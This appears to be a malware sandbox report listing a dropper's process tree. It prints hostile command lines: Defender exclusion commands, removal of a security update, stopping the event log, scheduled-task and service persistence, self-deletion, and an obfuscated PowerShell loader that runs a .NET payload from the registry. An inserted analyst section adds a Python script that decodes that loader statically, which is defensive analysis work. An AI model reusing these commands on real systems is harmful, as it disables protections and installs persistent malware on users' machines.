description pid Process procid_target PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 2944 wrote to memory of 576 2944 New Text Document mod.exe 31 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 1296 576 wrofile1.exe 32 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 576 wrote to memory of 2424 576 wrofile1.exe 33 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 1984 2944 New Text Document mod.exe 34 PID 2944 wrote to memory of 2876 2944 New Text Document mod.exe 35 PID 2944 wrote to memory of 2876 2944 New Text Document mod.exe 35 PID 2944 wrote to memory of 2876 2944 New Text 
Document mod.exe 35 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 3896 2944 New Text Document mod.exe 36 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2944 wrote to memory of 6180 2944 New Text Document mod.exe 37 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2876 wrote to memory of 6404 2876 cat.exe 39 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 6472 2944 New Text Document mod.exe 40 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5628 2944 New Text Document mod.exe 41 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 2944 wrote to memory of 5712 2944 New Text Document mod.exe 42 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 5712 wrote to memory of 5852 5712 Client-built.exe 43 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 6472 wrote to memory of 5960 6472 dog.exe 44 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 PID 2944 wrote to memory of 6048 2944 New Text Document mod.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4048 attrib.exe 4008 attrib.exe 5888 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6aed2439-4064-4a71-ab7f-c1494fa4f2bc}2⤵PID:5912
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1748
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:276
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:6332
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:844
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:7092
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6D67D78B-9591-4743-9130-47730C2CA09C} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:3512
-
4⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+'W'+'AR'+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4064
-
-
-
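The scheduled-task PowerShell command above (PID 4064, started by taskeng.exe under the SYSTEM task scheduler) is a fileless loader: it builds two strings out of single-character literals and `[Char](N)` casts, reads a value from the registry with them, and invokes the entry point of whatever .NET assembly is stored there. Nothing but the command line is needed to recover what it reads, so the following added example (ours, not tria.ge or the sample's code) folds the concatenation chains statically instead of running the script. It handles only the two constructs this command uses, quoted literals and `[Char](N)`, not `-join`, `-f` or `-replace` tricks; the string is copied verbatim from the process tree and the function names are ours.

```python
"""Statically fold the string-building tricks in the scheduled-task
PowerShell command ('' + 'S' + [Char](70) + ...) to recover the registry
location the loader reads its .NET assembly from. Added example, not part
of the report; the regexes and function names are ours."""
import re

# Copied from the powershell.EXE node of the process tree (PID 4064).
OBFUSCATED = (
    "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine"
    ".OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+'W'+'AR'+'E'+'')"
    ".GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)"
    "+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+''))"
    ".EntryPoint.Invoke($Null,$Null)"
)

# One concatenation term: a single-quoted literal (no escapes in this
# sample) or a [Char](N) cast. A chain is two or more terms joined by '+'.
TERM = r"(?:'[^']*'|\[Char\]\(\d+\))"
CHAIN = re.compile(TERM + r"(?:\s*\+\s*" + TERM + r")+")


def eval_term(term):
    """Evaluate one term to the text it contributes."""
    if term.startswith("'"):
        return term[1:-1]
    return chr(int(term[len("[Char]("):-1]))


def fold_strings(script):
    """Replace every literal/[Char] chain with a single quoted literal."""
    def fold(match):
        parts = re.findall(TERM, match.group(0))
        return "'" + "".join(eval_term(p) for p in parts) + "'"
    return CHAIN.sub(fold, script)


def registry_stage(script):
    """Return (subkey under HKLM, value name) that the folded loader reads."""
    folded = fold_strings(script)
    m = re.search(r"OpenSubkey\('([^']*)'\)\.GetValue\('([^']*)'\)", folded)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    print(fold_strings(OBFUSCATED))
    print(registry_stage(OBFUSCATED))
```

Folded, the command reads `HKLM\SOFTWARE`, value `dialerstager`, and hands the bytes to `[Reflection.Assembly]::Load`. That is the artifact to collect from the host: the payload never touches disk as a file, so a registry export of that value is what you need for the next stage of analysis. The value name matches the dialer.exe processes that appear under xtoxzfwgupjk.exe later in the tree, and the same PowerShell process shows a SetThreadContext into dllhost.exe (PID 5912).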
3⤵ C:\Windows\system32\taskeng.exe
command line: taskeng.exe {AD9BA19B-3C1B-42F9-ABF1-332EF62032D4} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]
- Loads dropped DLL
PID:3700
-
4⤵ C:\ProgramData\ntoskrnl.exe
command line: C:\ProgramData\ntoskrnl.exe
- Executes dropped EXE
PID:4128
-
-
4⤵ C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
command line: C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4152
-
5⤵ C:\Windows\explorer.exe
command line: explorer.exe
PID:4700
-
-
5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
command line: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
- Drops file in System32 directory
- System Network Configuration Discovery: Internet Connection Discovery
PID:4904
-
6⤵ C:\Windows\system32\PING.EXE
command line: "C:\Windows\system32\PING.EXE" 127.1.10.1
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5612
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:268
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:352
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1068
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1528
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1324
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1728
-
-
2⤵ C:\ProgramData\efibnbqijiyi\xtoxzfwgupjk.exe
command line: C:\ProgramData\efibnbqijiyi\xtoxzfwgupjk.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
3⤵ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
3⤵ C:\Windows\system32\cmd.exe
command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
PID:6192
-
4⤵ C:\Windows\system32\wusa.exe
command line: wusa /uninstall /kb:890830 /quiet /norestart
- Drops file in Windows directory
PID:5832
-
-
-
3⤵ C:\Windows\system32\powercfg.exe
command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
3⤵ C:\Windows\system32\powercfg.exe
command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
- Power Settings
PID:2312
-
-
3⤵ C:\Windows\system32\powercfg.exe
command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
- Power Settings
PID:5036
-
-
3⤵ C:\Windows\system32\powercfg.exe
command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
- Power Settings
PID:5088
-
-
3⤵ C:\Windows\system32\dialer.exe
command line: C:\Windows\system32\dialer.exe
PID:2504
-
-
3⤵ C:\Windows\system32\dialer.exe
command line: C:\Windows\system32\dialer.exe
PID:5964
-
-
3⤵ C:\Windows\system32\dialer.exe
command line: dialer.exe
PID:5376
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"C:\Users\Admin\AppData\Local\Temp\a\H3tyh96.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\a\cat.exe"C:\Users\Admin\AppData\Local\Temp\a\cat.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2876 -s 6164⤵
- Loads dropped DLL
PID:6404
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"3⤵
- Executes dropped EXE
PID:3896
-
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"3⤵
- Executes dropped EXE
PID:6180
-
-
C:\Users\Admin\AppData\Local\Temp\a\dog.exe"C:\Users\Admin\AppData\Local\Temp\a\dog.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6472 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 6164⤵
- Loads dropped DLL
- Program crash
PID:5960
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4252
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5628 -s 20724⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5712 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5712 -s 5964⤵
- Loads dropped DLL
PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\a\profile1.exe"C:\Users\Admin\AppData\Local\Temp\a\profile1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6108 -
C:\Users\Admin\AppData\Local\Temp\a\profile1.exeC:\Users\Admin\AppData\Local\Temp\a\profile1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6160 -
C:\ProgramData\images.exe"C:\ProgramData\images.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6568 -
C:\ProgramData\images.exeC:\ProgramData\images.exe6⤵
- Executes dropped EXE
PID:6896
-
-
C:\ProgramData\images.exeC:\ProgramData\images.exe6⤵
- Executes dropped EXE
PID:6920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\profile1.exeC:\Users\Admin\AppData\Local\Temp\a\profile1.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6220
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1664 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
- Loads dropped DLL
PID:668 -
C:\Windows\system32\mode.commode 65,105⤵PID:3324
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5472
-
-
C:\Windows\system32\attrib.exeattrib +H "in.exe"5⤵
- Views/modifies file attributes
PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"5⤵
- Executes dropped EXE
PID:6156 -
C:\Windows\system32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:4008
-
-
C:\Windows\system32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe6⤵
- Views/modifies file attributes
PID:4048
-
-
C:\Windows\system32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE6⤵
- Scheduled Task/Job: Scheduled Task
PID:4068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4288
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\pSRrNpLv0bS37RA.exe"C:\Users\Admin\AppData\Local\Temp\a\pSRrNpLv0bS37RA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Vzvbbx.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\Vzvbbx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3B9A.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:2348
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6624 -
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\europe123.exe"C:\Users\Admin\AppData\Local\Temp\a\europe123.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\a\l3bevvn7.exe"C:\Users\Admin\AppData\Local\Temp\a\l3bevvn7.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1776
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:3816
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:3832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ERVNFELP"4⤵
- Launches sc.exe
PID:3644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ERVNFELP" binpath= "C:\ProgramData\efibnbqijiyi\xtoxzfwgupjk.exe" start= "auto"4⤵
- Launches sc.exe
PID:3548
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ERVNFELP"4⤵
- Launches sc.exe
PID:2736
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\k1de2zkz.exe"C:\Users\Admin\AppData\Local\Temp\a\k1de2zkz.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\a\d8rb24m3.exe"C:\Users\Admin\AppData\Local\Temp\a\d8rb24m3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\a\Lu4421.exe"C:\Users\Admin\AppData\Local\Temp\a\Lu4421.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:324 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 324 -s 22164⤵
- Loads dropped DLL
PID:3156
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\lega.exe"C:\Users\Admin\AppData\Local\Temp\a\lega.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2464 -
